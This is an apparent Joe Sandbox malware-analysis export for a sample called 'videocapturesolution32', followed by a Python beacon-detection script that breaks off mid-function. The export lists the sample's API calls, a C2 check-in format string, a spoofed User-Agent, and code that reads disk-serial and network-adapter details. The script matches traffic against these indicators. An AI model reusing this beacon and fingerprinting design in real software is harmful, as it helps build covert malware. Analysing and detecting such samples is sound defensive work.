61518->61519 61555 2dbddb3 61519->61555 61524 2dc3493 61525 2dc5c72 __getptd_noexit 59 API calls 61524->61525 61527 2dc349c 61525->61527 61526 2dc34b7 RtlExitUserThread 61527->61526 61528 2dc34ab 61527->61528 61529 2dc34b0 61527->61529 61670 2dc3596 LoadLibraryExW GetProcAddress RtlEncodePointer RtlDecodePointer 61528->61670 61671 2dc5c24 59 API calls 2 library calls 61529->61671 61532 2dc34b6 61532->61526 61551 2dc1674 61533->61551 61534 2dc16f0 61535 2dc1706 61534->61535 61537 2dc1703 CloseHandle 61534->61537 61571 2dc454b 61535->61571 61536 2dc16ce ResetEvent 61543 2dc16d5 61536->61543 61537->61535 61539 2dc179c WaitForSingleObject 61539->61551 61540 2dc168c 61540->61536 61541 2dc16a5 OpenEventA 61540->61541 61578 2dc1c10 GetCurrentProcessId 61540->61578 61545 2dc16bf 61541->61545 61546 2dc16c7 61541->61546 61542 2dc171e 61542->61518 61542->61519 61579 2dc1850 CreateEventA CloseHandle SetEvent GetCurrentProcessId 61543->61579 61545->61546 61548 2dc16c4 CloseHandle 61545->61548 61546->61536 61546->61543 61547 2dc16a2 61547->61541 61548->61546 61549 2dc1770 CreateEventA 61549->61551 61551->61534 61551->61539 61551->61540 61551->61549 61553 2dc178e CloseHandle 61551->61553 61580 2dc1c10 GetCurrentProcessId 61551->61580 61553->61551 61554 2dc16ed 61554->61534 61556 2dbddd5 61555->61556 61582 2db4d86 61556->61582 61557 2dbddd8 61559 2dc1f30 61557->61559 61560 2dc1f69 TlsGetValue 61559->61560 61570 2dc1f61 Mailbox 61559->61570 61560->61570 61561 2dc1fdd 61562 2dc2006 61561->61562 61564 2dc1ffe GetProcessHeap HeapFree 61561->61564 61562->61524 61563 2dc1fb9 61565 2dc1610 17 API calls 61563->61565 61564->61562 61567 2dc1fc8 61565->61567 61566 2dc2049 GetProcessHeap HeapFree 61566->61570 61567->61561 61568 2dc1fd5 TlsSetValue 61567->61568 61568->61561 61569 2dc203b GetProcessHeap HeapFree 61569->61566 61570->61561 61570->61563 61570->61566 61570->61569 61572 2dc4555 IsProcessorFeaturePresent 61571->61572 61573 2dc4553 61571->61573 61575 2dc958f 61572->61575 61573->61542 
61581 2dc953e 5 API calls ___raise_securityfailure 61575->61581 61577 2dc9672 61577->61542 61578->61547 61579->61554 61580->61551 61581->61577 61583 2db4d90 __EH_prolog 61582->61583 61584 2dc0b10 Mailbox 68 API calls 61583->61584 61585 2db4da6 RtlEnterCriticalSection RtlLeaveCriticalSection 61584->61585 61586 2db50d4 shared_ptr 61585->61586 61595 2db4dd1 std::bad_exception::bad_exception 61585->61595 61586->61557 61588 2db50a1 RtlEnterCriticalSection RtlLeaveCriticalSection 61589 2db50b3 RtlEnterCriticalSection RtlLeaveCriticalSection 61588->61589 61589->61586 61589->61595 61590 2dba724 73 API calls 61590->61595 61592 2db4e8d RtlEnterCriticalSection RtlLeaveCriticalSection 61593 2db4e9f RtlEnterCriticalSection RtlLeaveCriticalSection 61592->61593 61593->61595 61594 2dbced8 73 API calls 61594->61595 61595->61588 61595->61589 61595->61590 61595->61592 61595->61593 61595->61594 61602 2db4bed 61595->61602 61626 2db7d23 60 API calls 61595->61626 61627 2dbd00a 60 API calls 2 library calls 61595->61627 61628 2db7cfd 60 API calls std::bad_exception::bad_exception 61595->61628 61629 2dba9b1 60 API calls 2 library calls 61595->61629 61630 2dbaa89 210 API calls 3 library calls 61595->61630 61631 2dc18f0 GetProcessHeap HeapFree 61595->61631 61632 2db4100 GetProcessHeap HeapFree 61595->61632 61603 2db4bf7 __EH_prolog 61602->61603 61604 2db1ba7 209 API calls 61603->61604 61605 2db4c31 61604->61605 61633 2db3a94 61605->61633 61607 2db4c3c 61608 2db3a94 60 API calls 61607->61608 61609 2db4c56 61608->61609 61636 2db85d1 61609->61636 61614 2dc0b10 Mailbox 68 API calls 61615 2db4cb8 61614->61615 61661 2dbc28f 61615->61661 61617 2db4ce1 InterlockedExchange 61665 2db2995 95 API calls Mailbox 61617->61665 61621 2db4d06 61625 2db4d3c 61621->61625 61666 2db858d 76 API calls Mailbox 61621->61666 61667 2db82f7 82 API calls Mailbox 61621->61667 61668 2db2995 95 API calls Mailbox 61621->61668 61622 2db4d57 shared_ptr 61622->61595 61669 2db861a 75 API calls 2 library calls 61625->61669 

                                                          Control-flow Graph
                                                          APIs
                                                          • Sleep.KERNEL32(0000EA60), ref: 02DB6708
                                                          • RtlEnterCriticalSection.NTDLL(02DE71E0), ref: 02DB6713
                                                          • RtlLeaveCriticalSection.NTDLL(02DE71E0), ref: 02DB6724
                                                          • InternetOpenA.WININET(?), ref: 02DB72B5
                                                          • InternetSetOptionA.WININET(00000000,00000002,?), ref: 02DB72DD
                                                          • InternetSetOptionA.WININET(00000000,00000005,00001388,00000004), ref: 02DB72F5
                                                          • InternetSetOptionA.WININET(00000000,00000006,00001388,00000004), ref: 02DB730D
                                                          • InternetOpenUrlA.WININET(00000000,?,?,000000FF,04000200), ref: 02DB7336
                                                          • InternetReadFile.WININET(00000000,?,00001000,?), ref: 02DB7358
                                                          • InternetCloseHandle.WININET(00000000), ref: 02DB7378
                                                          • InternetCloseHandle.WININET(00000000), ref: 02DB7383
                                                          • RtlEnterCriticalSection.NTDLL(02DE71E0), ref: 02DB73EE
                                                          • RtlLeaveCriticalSection.NTDLL(02DE71E0), ref: 02DB73FF
                                                          • _malloc.LIBCMT ref: 02DB7498
                                                          • RtlEnterCriticalSection.NTDLL(02DE71E0), ref: 02DB74AA
                                                          • RtlLeaveCriticalSection.NTDLL(02DE71E0), ref: 02DB74B6
                                                          • _malloc.LIBCMT ref: 02DB758E
                                                          • _strtok.LIBCMT ref: 02DB75BF
                                                          • _swscanf.LIBCMT ref: 02DB75D6
                                                          • _strtok.LIBCMT ref: 02DB75ED
                                                          • _free.LIBCMT ref: 02DB75F9
                                                          • Sleep.KERNEL32(000007D0), ref: 02DB76F1
                                                          • RtlEnterCriticalSection.NTDLL(02DE71E0), ref: 02DB7772
                                                          • RtlLeaveCriticalSection.NTDLL(02DE71E0), ref: 02DB7784
                                                          • _sprintf.LIBCMT ref: 02DB7822
                                                          • RtlEnterCriticalSection.NTDLL(00000020), ref: 02DB78E6
                                                          • RtlLeaveCriticalSection.NTDLL(00000020), ref: 02DB791A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalSection$Internet$EnterLeave$Option$CloseHandleOpenSleep_malloc_strtok$FileRead_free_sprintf_swscanf
                                                          • String ID: $%d;$<htm$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$auth_ip$auth_swith$block$connect$disconnect$idle$updips$updurls$urls
                                                          • API String ID: 1657546717-1839899575
                                                          • Opcode ID: 57505c6520af899eac221797420a73439683a70f9650aecdba99b3a1460d602b
                                                          • Instruction ID: b7210d4ba45b8c5ad29d783e247fd6c0d203ce7503bc80803f418014db472bb1
                                                          • Opcode Fuzzy Hash: 57505c6520af899eac221797420a73439683a70f9650aecdba99b3a1460d602b
                                                          • Instruction Fuzzy Hash: 6E32BF32548381DBE726AB24D865BEBB7E6EFC5314F10081DF58A97391DB70AD04CB62

                                                          Control-flow Graph

                                                          APIs
                                                          • RtlInitializeCriticalSection.NTDLL(02DE71E0), ref: 02DB64BA
                                                          • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02DB64D1
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02DB64DA
                                                          • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02DB64E9
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02DB64EC
                                                          • GetTickCount.KERNEL32 ref: 02DB64F8
                                                            • Part of subcall function 02DB605A: _malloc.LIBCMT ref: 02DB6068
                                                          • GetVersionExA.KERNEL32(02DE7038), ref: 02DB6525
                                                          • _malloc.LIBCMT ref: 02DB6551
                                                            • Part of subcall function 02DC2FAC: __FF_MSGBANNER.LIBCMT ref: 02DC2FC3
                                                            • Part of subcall function 02DC2FAC: __NMSG_WRITE.LIBCMT ref: 02DC2FCA
                                                            • Part of subcall function 02DC2FAC: RtlAllocateHeap.NTDLL(00910000,00000000,00000001), ref: 02DC2FEF
                                                          • _malloc.LIBCMT ref: 02DB6561
                                                          • _malloc.LIBCMT ref: 02DB656C
                                                          • _malloc.LIBCMT ref: 02DB6577
                                                          • _malloc.LIBCMT ref: 02DB6582
                                                          • _malloc.LIBCMT ref: 02DB658D
                                                          • _malloc.LIBCMT ref: 02DB6598
                                                          • _malloc.LIBCMT ref: 02DB65A7
                                                          • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02DB65BE
                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02DB65C7
                                                          • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02DB65D6
                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02DB65D9
                                                          • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02DB65E4
                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02DB65E7
                                                          • RtlEnterCriticalSection.NTDLL(02DE71E0), ref: 02DB6621
                                                          • RtlLeaveCriticalSection.NTDLL(02DE71E0), ref: 02DB662E
                                                          • _malloc.LIBCMT ref: 02DB6652
                                                          • _malloc.LIBCMT ref: 02DB6660
                                                          • _malloc.LIBCMT ref: 02DB6667
                                                          • _malloc.LIBCMT ref: 02DB668D
                                                          • QueryPerformanceCounter.KERNEL32(00000200), ref: 02DB66A0
                                                          • Sleep.KERNEL32 ref: 02DB66AE
                                                          • _malloc.LIBCMT ref: 02DB66BA
                                                          • _malloc.LIBCMT ref: 02DB66C7
                                                          • Sleep.KERNEL32(0000EA60), ref: 02DB6708
                                                          • RtlEnterCriticalSection.NTDLL(02DE71E0), ref: 02DB6713
                                                          • RtlLeaveCriticalSection.NTDLL(02DE71E0), ref: 02DB6724
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _malloc$Heap$CriticalSection$Allocate$Process$AddressEnterHandleLeaveModuleProcSleep$CountCounterInitializePerformanceQueryTickVersion
                                                          • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d$ntdll.dll$sprintf$strcat
                                                          • API String ID: 4273019447-2678694477
                                                          • Opcode ID: 8f12b3f723132e816582d605be4c68f591b8ea2f9812a6ee206c2bd69cdcd8dd
                                                          • Instruction ID: 8c9175546d90ff952fedd3e7ad092b8c86701c2bc5921d41b9317cf0279af9f3
                                                          • Opcode Fuzzy Hash: 8f12b3f723132e816582d605be4c68f591b8ea2f9812a6ee206c2bd69cdcd8dd
                                                          • Instruction Fuzzy Hash: 87717071D49340ABE7106F31AC49B6BBBE9EF85710F20085EF98597380DBB49C10CBA6

                                                          Control-flow Graph

                                                          APIs
                                                          • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 00401B5D
                                                          • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00401B74
                                                          • GetAdaptersInfo.IPHLPAPI(?,00000400), ref: 00401B9D
                                                          • FreeLibrary.KERNEL32(00401A3E), ref: 00401C1B
Memory Dump Source
• Source File: 00000004.00000002.2973116991.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2973116991.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                          • String ID: GetAdaptersInfo$iphlpapi.dll$o
                                                          • API String ID: 514930453-3667123677
                                                          • Opcode ID: a648eded5dba78bf16f4a137e2c2b6b7b052dc293c02733a72e5b458839b5e0e
                                                          • Instruction ID: a9f54c968f2091474e8feb0d981771773be25d9c6ef5ebc30493122ab1168d3f
                                                          • Opcode Fuzzy Hash: a648eded5dba78bf16f4a137e2c2b6b7b052dc293c02733a72e5b458839b5e0e
                                                          • Instruction Fuzzy Hash: E821B870904209AEDF219F65C9447EF7FB8EF45345F0440BAE604B62A1E7389A85CB69

Control-flow Graph (rendered graph not preserved; summary of the exported nodes)

• 21 basic blocks, 2dbf9a6-2dbfa90: LoadLibraryA at 2dbf9a6-2dbf9c9, GetProcAddress at 2dbf9cf-2dbf9dd, GetAdaptersInfo at 2dbf9f5-2dbfa01, FreeLibrary at 2dbfa82-2dbfa83; internal calls to 2dc37a8 (2dbfa43-2dbfa49), 2dc3b4c (2dbfa68-2dbfa73) and 2dbf6f5 (2dbfa28-2dbfa35); 2dbfa21-2dbfa26 loops on itself and 2dbfa75-2dbfa78 branches back to the GetAdaptersInfo block
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 02DBF9BC
                                                          • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02DBF9D5
                                                          • GetAdaptersInfo.IPHLPAPI(?,?), ref: 02DBF9FA
                                                          • FreeLibrary.KERNEL32(00000000), ref: 02DBFA83
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                          • String ID: GetAdaptersInfo$iphlpapi.dll
                                                          • API String ID: 514930453-3114217049
                                                          • Opcode ID: 2e31f40b09f7fbb168340419f53c6307e0a6ed48ae268b7e8a097f6bef4a836a
                                                          • Instruction ID: cbcc0ba65347720696d044f2f74a5e986049f61456ca34aa012da3d242dcc113
                                                          • Opcode Fuzzy Hash: 2e31f40b09f7fbb168340419f53c6307e0a6ed48ae268b7e8a097f6bef4a836a
                                                          • Instruction Fuzzy Hash: E7219371A08209EFDB15DBA8DC90AEEBBB9EF0A314F1440A9E446E7750D7309D45CBA0

Control-flow Graph (rendered graph not preserved; summary of the exported nodes)

• 20 basic blocks, 2dbf8a2-2dbf9a5: CreateFileA at 2dbf8a2-2dbf8cd, DeviceIoControl at 2dbf8eb-2dbf90d, GetLastError at 2dbf960-2dbf969, CloseHandle at 2dbf994-2dbf99d; internal calls to 2dc37a8 (2dbf950-2dbf956), 2dc3b4c (2dbf97a-2dbf987) and 2dbf6f5 (2dbf939-2dbf945); 2dbf932-2dbf937 loops on itself and 2dbf989-2dbf98f branches back to the DeviceIoControl block
                                                          APIs
                                                          • CreateFileA.KERNEL32(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 02DBF8C1
                                                          • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000400,?,00000000), ref: 02DBF8FF
                                                          • GetLastError.KERNEL32 ref: 02DBF960
                                                          • CloseHandle.KERNEL32(?), ref: 02DBF997
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                          • String ID: \\.\PhysicalDrive0
                                                          • API String ID: 4026078076-1180397377
                                                          • Opcode ID: 317ee31f6880bcd2d482042c701f953ef741912aa35a530ef3f19cbd820b3762
                                                          • Instruction ID: 4dd32414141e97d37e7c9d491b3186461266cedb94d96db99374ae1caff62940
                                                          • Opcode Fuzzy Hash: 317ee31f6880bcd2d482042c701f953ef741912aa35a530ef3f19cbd820b3762
                                                          • Instruction Fuzzy Hash: 9D314C71D00219EFDF259F98D894AEEBBB9EF08714F2081A9F506A3780D7705E05CB90

Control-flow Graph (rendered graph not preserved; summary of the exported nodes)

• 17 basic blocks, 401a4f-401b4a: CreateFileA at 401a4f-401a77, DeviceIoControl at 401a98-401ac0, GetLastError at 401b0e-401b17, CloseHandle at 401b3a-401b44; internal calls to 403106 (401afd-401b03), 403120 and 4018cc (401adb-401af1) and 4030f8 (401b27-401b34); 401b27-401b34 branches back to the DeviceIoControl block
                                                          APIs
                                                          • CreateFileA.KERNEL32(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 00401A6B
                                                          • DeviceIoControl.KERNEL32(?,002D1400,?,0000000C,?,00000400,00000400,00000000), ref: 00401AB2
                                                          • GetLastError.KERNEL32 ref: 00401B0E
                                                          • CloseHandle.KERNEL32(?), ref: 00401B3D
Memory Dump Source
• Source File: 00000004.00000002.2973116991.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2973116991.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                          • String ID: \\.\PhysicalDrive0
                                                          • API String ID: 4026078076-1180397377
                                                          • Opcode ID: 5b2aa4f6f1db506efa266d4c362af4cf52cfeed2701d30c33ae5bfe5944f1550
                                                          • Instruction ID: ae54cd8959710a424601ffd4623f532e2396a469a493930b182490efebea7a61
                                                          • Opcode Fuzzy Hash: 5b2aa4f6f1db506efa266d4c362af4cf52cfeed2701d30c33ae5bfe5944f1550
                                                          • Instruction Fuzzy Hash: 50318D71D01118EECB21EF95CD809EFBBB8EF45750F20807AE514B22A0E7785E45CB98

                                                          Control-flow Graph

                                                          APIs
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02DB1D11
                                                          • GetLastError.KERNEL32 ref: 02DB1D23
                                                            • Part of subcall function 02DB1712: __EH_prolog.LIBCMT ref: 02DB1717
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02DB1D59
                                                          • GetLastError.KERNEL32 ref: 02DB1D6B
                                                          • __beginthreadex.LIBCMT ref: 02DB1DB1
                                                          • GetLastError.KERNEL32 ref: 02DB1DC6
                                                          • CloseHandle.KERNEL32(00000000), ref: 02DB1DDD
                                                          • CloseHandle.KERNEL32(00000000), ref: 02DB1DEC
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02DB1E14
                                                          • CloseHandle.KERNEL32(00000000), ref: 02DB1E1B
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseErrorHandleLast$CreateEvent$H_prologObjectSingleWait__beginthreadex
                                                          • String ID: thread$thread.entry_event$thread.exit_event
                                                          • API String ID: 831262434-3017686385
                                                          • Opcode ID: 7e7aeecb75f94a69e2a8f3a354bc3ffda40a51c49d1a81772e5ef9bdd2c7fc37
                                                          • Instruction ID: 455c1976765a81e90eaaf685a1395c5c58a013296695e6e3efcbf5defab0fc99
                                                          • Opcode Fuzzy Hash: 7e7aeecb75f94a69e2a8f3a354bc3ffda40a51c49d1a81772e5ef9bdd2c7fc37
                                                          • Instruction Fuzzy Hash: BD315A71A007019FE701EF20C858B6BBBA5EF84754F20496DF959C7390DB709C49CBA2

                                                          Control-flow Graph

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 02DB4D8B
                                                          • RtlEnterCriticalSection.NTDLL(02DE71E0), ref: 02DB4DB7
                                                          • RtlLeaveCriticalSection.NTDLL(02DE71E0), ref: 02DB4DC3
                                                            • Part of subcall function 02DB4BED: __EH_prolog.LIBCMT ref: 02DB4BF2
                                                            • Part of subcall function 02DB4BED: InterlockedExchange.KERNEL32(?,00000000), ref: 02DB4CF2
                                                          • RtlEnterCriticalSection.NTDLL(02DE71E0), ref: 02DB4E93
                                                          • RtlLeaveCriticalSection.NTDLL(02DE71E0), ref: 02DB4E99
                                                          • RtlEnterCriticalSection.NTDLL(02DE71E0), ref: 02DB4EA0
                                                          • RtlLeaveCriticalSection.NTDLL(02DE71E0), ref: 02DB4EA6
                                                          • RtlEnterCriticalSection.NTDLL(02DE71E0), ref: 02DB50A7
                                                          • RtlLeaveCriticalSection.NTDLL(02DE71E0), ref: 02DB50AD
                                                          • RtlEnterCriticalSection.NTDLL(02DE71E0), ref: 02DB50B8
                                                          • RtlLeaveCriticalSection.NTDLL(02DE71E0), ref: 02DB50C1
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
                                                          • String ID:
                                                          • API String ID: 2062355503-0
                                                          • Opcode ID: bfe4e16c1adc578bf6e4a30fdf901308e27d427862375a717444531f9965aea9
                                                          • Instruction ID: 598fbeac9a0e98c535ba9c5b23cc865c6cda0023954634f4455453abed180741
                                                          • Opcode Fuzzy Hash: bfe4e16c1adc578bf6e4a30fdf901308e27d427862375a717444531f9965aea9
                                                          • Instruction Fuzzy Hash: 19B14A71D0025EDEEF22DF94D860BEEBBB5EF04304F24409AE406A6281DB745E49CFA1

Control-flow Graph (rendered graph not preserved; summary of the exported nodes)

• 20 basic blocks, 401f64-40209a: FindResourceA at 401f64-401f84, GetLastError and SizeofResource at 401f86-401f9d, LoadResource, LockResource and GlobalAlloc plus two calls to 402d60 at 401fa6-401fec, GetTickCount at 401ffb-402003, GlobalAlloc and a call to 401c26 at 402053-402083; 401fee-401ff9 loops on itself, and the blocks within 402009-402030 and within 40203a-402051 form two further loops before 402053
                                                          APIs
                                                          • FindResourceA.KERNEL32(?,0000000A), ref: 00401F7A
                                                          • GetLastError.KERNEL32 ref: 00401F86
                                                          • SizeofResource.KERNEL32(00000000), ref: 00401F93
                                                          • LoadResource.KERNEL32(00000000), ref: 00401FAD
                                                          • LockResource.KERNEL32(00000000), ref: 00401FB4
                                                          • GlobalAlloc.KERNEL32(00000040,00000000), ref: 00401FBF
                                                          • GetTickCount.KERNEL32 ref: 00401FFB
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00402061
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2973116991.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2973116991.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: Resource$AllocGlobal$CountErrorFindLastLoadLockSizeofTick
                                                          • String ID:
                                                          • API String ID: 564119183-0
                                                          • Opcode ID: 4b406982c55cd146a53e35bcfe0d224a47769fdd51ac53a5645699cce47c5184
                                                          • Instruction ID: b01298f5e92dfabffd3260d40ec81ee59ee3d80feb476c4020a7475af27d6630
                                                          • Opcode Fuzzy Hash: 4b406982c55cd146a53e35bcfe0d224a47769fdd51ac53a5645699cce47c5184
                                                          • Instruction Fuzzy Hash: 60315C32900255EFDB105FB89F8896F7B68EF45344B10807AFA86F7281DA748941C7A8

Control-flow Graph (rendered graph not preserved; summary of the exported nodes)

• 23 basic blocks across two address ranges, 2db7b1c-2db7c11 and 2db66f8-2db6796: call 2dc4af0 at 2db7b2e, call 2db439c at 2db7b33-2db7b46, call 2db534d at 2db7b48-2db7b4a, call 2dc2f74 at 2db7b4f-2db7b56 (followed by 2db66f8-2db66fd), Sleep at 2db6708, RtlEnterCriticalSection and RtlLeaveCriticalSection at 2db670e-2db6742, two calls to 2dc4af0 at 2db676c-2db6790
                                                          APIs
                                                          • Sleep.KERNEL32(0000EA60), ref: 02DB6708
                                                          • RtlEnterCriticalSection.NTDLL(02DE71E0), ref: 02DB6713
                                                          • RtlLeaveCriticalSection.NTDLL(02DE71E0), ref: 02DB6724
                                                          • _free.LIBCMT ref: 02DB7B50
                                                          Strings
                                                          • urls, xrefs: 02DB7B36
                                                          • Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US), xrefs: 02DB6739
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalSection$EnterLeaveSleep_free
                                                          • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$urls
                                                          • API String ID: 2653569029-4235545730
                                                          • Opcode ID: c7894c2cb32892f1a1c1d27bc912b414b8cc3409b6e8d60848e7a1d5e6266743
                                                          • Instruction ID: c5614bfc66d971c0e0b8605633dac572c1f31189251f1b9028c5988182af0e1c
                                                          • Opcode Fuzzy Hash: c7894c2cb32892f1a1c1d27bc912b414b8cc3409b6e8d60848e7a1d5e6266743
                                                          • Instruction Fuzzy Hash: E4315A3290C380EBE7129F34A8647DA7BB1EF86714F18099DE5C29B386D760DC01C796
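Added detection example (editor's code, not part of the Joe Sandbox output): a Python scanner over constructed proxy log lines that decodes the check-in query string from the format string reported for this sample (cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d, so cid and the port bounds are hex and os is major.minor.build), flags the hard-coded User-Agent (no Windows release sends "Windows NT 9.0"), and flags hosts that check in at the 300000 ms (0x493E0) SetWaitableTimer period the report lists for this sample. The log line format, the host c2.example.invalid and the path /beacon are assumptions; the real C2 endpoints are the ones in the extracted configuration, and treating the timer period as the check-in interval is an inference, not something the report states.

```python
import re
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

# Indicators taken from the strings in the report: the check-in format string
# and the hard-coded User-Agent. "Windows NT 9.0" is not a version any Windows
# release reports, so the UA on its own is a usable indicator.
BEACON_UA = "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)"
BEACON_KEYS = {"cid", "connected", "sport", "high_port", "low_port",
               "stream", "os", "dgt", "dti"}
# SetWaitableTimer period in the report: 0x493E0 = 300000 ms. Assumed (not
# stated by the report) to drive the check-in.
BEACON_PERIOD_S = 300
PERIOD_TOLERANCE = 0.1

# Constructed proxy log lines (not from the report): <ISO time> <src> <url> "<ua>".
# Host and path are placeholders; the query follows the report's format string.
SAMPLE_LOG = """\
2024-12-17T10:00:00 10.0.0.5 http://c2.example.invalid/beacon?cid=0a1b2c3d&connected=1&sport=1080&high_port=ffff&low_port=0400&stream=0&os=6.1.7601&dgt=0&dti=1 "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)"
2024-12-17T10:01:30 10.0.0.7 http://www.example.invalid/index.html "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
2024-12-17T10:05:02 10.0.0.5 http://c2.example.invalid/beacon?cid=0a1b2c3d&connected=1&sport=1080&high_port=ffff&low_port=0400&stream=1&os=6.1.7601&dgt=0&dti=1 "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)"
2024-12-17T10:09:58 10.0.0.5 http://c2.example.invalid/beacon?cid=0a1b2c3d&connected=1&sport=1080&high_port=ffff&low_port=0400&stream=1&os=6.1.7601&dgt=0&dti=1 "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)"
2024-12-17T10:12:00 10.0.0.9 http://www.example.invalid/search?cid=12&stream=1 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
"""

LOG_RE = re.compile(r'^(\S+) (\S+) (\S+) "([^"]*)"$')
OS_RE = re.compile(r"^\d+\.\d+\.\d{4,}$")   # %d.%d.%04d


def parse_beacon(url):
    """Decode the check-in parameters if `url` carries every key of the
    report's format string, else return None. cid is %.8x and the port
    bounds are %x, so those are parsed as hex; the rest are decimal."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    if not BEACON_KEYS.issubset(qs) or not OS_RE.match(qs["os"][0]):
        return None
    try:
        return {
            "cid": int(qs["cid"][0], 16),
            "connected": int(qs["connected"][0]),
            "sport": int(qs["sport"][0]),
            "high_port": int(qs["high_port"][0], 16),
            "low_port": int(qs["low_port"][0], 16),
            "stream": int(qs["stream"][0]),
            "os": qs["os"][0],
            "dgt": int(qs["dgt"][0]),
            "dti": int(qs["dti"][0]),
        }
    except ValueError:
        return None


def scan_log(text):
    """Return (src, reason) alerts: the hard-coded UA, a decoded check-in,
    and check-ins from the same source repeating at BEACON_PERIOD_S
    (within PERIOD_TOLERANCE)."""
    alerts = []
    last_seen = {}
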